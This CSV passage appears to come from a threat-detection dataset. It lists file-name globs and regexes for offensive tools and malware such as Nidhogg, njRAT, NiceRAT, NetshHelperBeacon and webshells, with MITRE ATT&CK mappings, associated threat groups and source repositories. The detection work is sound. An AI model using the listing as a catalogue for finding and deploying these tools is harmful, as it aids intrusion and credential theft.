"*\NetRipperLog.txt*",".{0,1000}\\NetRipperLog\.txt.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16808"
"*\NetSess.exe*",".{0,1000}\\NetSess\.exe.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","0","N/A","N/A","7","9","N/A","N/A","N/A","N/A","16820"
"*\NetSess.zip*",".{0,1000}\\NetSess\.zip.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","0","N/A","N/A","7","9","N/A","N/A","N/A","N/A","16821"
"*\NetshHelperBeacon.cpp*",".{0,1000}\\NetshHelperBeacon\.cpp.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","16823"
"*\NetshHelperBeacon.dll*",".{0,1000}\\NetshHelperBeacon\.dll.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","16824"
"*\NetshHelperBeacon.lib*",".{0,1000}\\NetshHelperBeacon\.lib.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","16825"
"*\NetshHelperBeacon.log*",".{0,1000}\\NetshHelperBeacon\.log.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","16826"
"*\NetshHelperBeacon.pdb*",".{0,1000}\\NetshHelperBeacon\.pdb.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","16827"
"*\NetshHelperBeacon\*",".{0,1000}\\NetshHelperBeacon\\.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","16828"
"*\netshlep.cpp*",".{0,1000}\\netshlep\.cpp.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","16829"
"*\netview.py*",".{0,1000}\\netview\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16837"
"*\netview.x64.dll*",".{0,1000}\\netview\.x64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","16838"
"*\netwalker.txt*",".{0,1000}\\netwalker\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16839"
"*\NetworkFileManagerPHP.php*",".{0,1000}\\NetworkFileManagerPHP\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16840"
"*\NetworkServiceExploit.pdb*",".{0,1000}\\NetworkServiceExploit\.pdb.{0,1000}","offensive_tool_keyword","NetworkServiceExploit","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","NetworkServiceExploit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16841"
"*\NetworkServiceExploit.pdb*",".{0,1000}\\NetworkServiceExploit\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","NetworkServiceExploit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16842"
"*\NewPhish.ps1*",".{0,1000}\\NewPhish\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","16843"
"*\nGenerated payload:*",".{0,1000}\\nGenerated\spayload\:.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","16844"
"*\Ngrok-Disk.dll*",".{0,1000}\\Ngrok\-Disk\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","16851"
"*\Ngrok-Install.dll*",".{0,1000}\\Ngrok\-Install\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","16852"
"*\NiceFile.ppam*",".{0,1000}\\NiceFile\.ppam.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","16853"
"*\NiceRAT.py*",".{0,1000}\\NiceRAT\.py.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","16854"
"*\NiceRAT-1.0.0.zip*",".{0,1000}\\NiceRAT\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","16855"
"*\NiceRAT-main\*",".{0,1000}\\NiceRAT\-main\\.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","16856"
"*\Nidhogg.cpp*",".{0,1000}\\Nidhogg\.cpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","16857"
"*\Nidhogg.exe*",".{0,1000}\\Nidhogg\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","16858"
"*\Nidhogg.sln*",".{0,1000}\\Nidhogg\.sln.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","16859"
"*\Nidhogg.sys*",".{0,1000}\\Nidhogg\.sys.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","16860"
"*\NidhoggClient.exe*",".{0,1000}\\NidhoggClient\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","16861"
"*\NidhoggClient\*",".{0,1000}\\NidhoggClient\\.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","16862"
"*\nightCrawler.ps1*",".{0,1000}\\nightCrawler\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","16863"
"*\nikto.py*",".{0,1000}\\nikto\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16864"
"*\NimBlackout*",".{0,1000}\\NimBlackout.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","16865"
"*\NimDllSideload\*",".{0,1000}\\NimDllSideload\\.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","16866"
"*\Nimperiments-main*",".{0,1000}\\Nimperiments\-main.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","16867"
"*\NimPlant.*",".{0,1000}\\NimPlant\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","16868"
"*\nimproxydll\*",".{0,1000}\\nimproxydll\\.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","16869"
"*\nimproxydll-main\*",".{0,1000}\\nimproxydll\-main\\.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","16870"
"*\Ninja.py*",".{0,1000}\\Ninja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","16873"
"*\NIX REMOTE WEB-SHELL.php*",".{0,1000}\\NIX\sREMOTE\sWEB\-SHELL\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16878"
"*\NJRAT 7.exe*",".{0,1000}\\NJRAT\s7\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1071.001 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1555.003 - T1132.001 - T1005 - T1568.001 - T1041 - T1083 - T1562.004 - T1070.004 - T1070.009 - T1105 - T1056.001 - T1112 - T1106 - T1571 - T1027.004 - T1027.013 - T1120 - T1057 - T1012 - T1021.001 - T1018 - T1091 - T1113 - T1082 - T1033 - T1125","TA0002 - TA0003 - TA0005 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Transparent Tribe - Group5 - Aquatic Panda - APT41 - LazyScripter - Gorgon Group - TA2541 - APT-C-27 - APT-C-36","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16879"
"*\njRat Lime Edition *.exe*",".{0,1000}\\njRat\sLime\sEdition\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1071.001 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1555.003 - T1132.001 - T1005 - T1568.001 - T1041 - T1083 - T1562.004 - T1070.004 - T1070.009 - T1105 - T1056.001 - T1112 - T1106 - T1571 - T1027.004 - T1027.013 - T1120 - T1057 - T1012 - T1021.001 - T1018 - T1091 - T1113 - T1082 - T1033 - T1125","TA0002 - TA0003 - TA0005 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Transparent Tribe - Group5 - Aquatic Panda - APT41 - LazyScripter - Gorgon Group - TA2541 - APT-C-27","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16880"
"*\njRAT v*.exe*",".{0,1000}\\njRAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1071.001 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1555.003 - T1132.001 - T1005 - T1568.001 - T1041 - T1083 - T1562.004 - T1070.004 - T1070.009 - T1105 - T1056.001 - T1112 - T1106 - T1571 - T1027.004 - T1027.013 - T1120 - T1057 - T1012 - T1021.001 - T1018 - T1091 - T1113 - T1082 - T1033 - T1125","TA0002 - TA0003 - TA0005 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Transparent Tribe - Group5 - Aquatic Panda - APT41 - LazyScripter - Gorgon Group - TA2541 - APT-C-27","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16881"
"*\njRAT.exe*",".{0,1000}\\njRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1071.001 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1555.003 - T1132.001 - T1005 - T1568.001 - T1041 - T1083 - T1562.004 - T1070.004 - T1070.009 - T1105 - T1056.001 - T1112 - T1106 - T1571 - T1027.004 - T1027.013 - T1120 - T1057 - T1012 - T1021.001 - T1018 - T1091 - T1113 - T1082 - T1033 - T1125","TA0002 - TA0003 - TA0005 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Transparent Tribe - Group5 - Aquatic Panda - APT41 - LazyScripter - Gorgon Group - TA2541 - APT-C-27","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16882"
"*\njworm.exe*",".{0,1000}\\njworm\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16883"
"*\NLBrute*.rar*",".{0,1000}\\NLBrute.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","16884"
"*\NLBrute*.zip*",".{0,1000}\\NLBrute.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","16885"
"*\NLBrute.exe*",".{0,1000}\\NLBrute\.exe.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","16886"
"*\nmap-ajp.py*",".{0,1000}\\nmap\-ajp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16888"
"*\nmapAnswerMachine.exe*",".{0,1000}\\nmapAnswerMachine\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16889"
